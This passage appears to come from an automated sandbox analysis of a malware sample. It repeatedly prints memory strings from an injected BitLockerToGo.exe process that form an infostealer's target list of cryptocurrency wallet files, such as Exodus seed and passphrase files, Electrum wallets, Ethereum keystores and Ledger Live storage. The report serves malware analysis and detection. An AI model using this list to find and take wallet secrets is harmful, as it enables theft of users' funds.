Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe, 00000000.00000000.1681656576.00000000014D5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: #github.com/ethereum/go-ethereum/rlp
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local 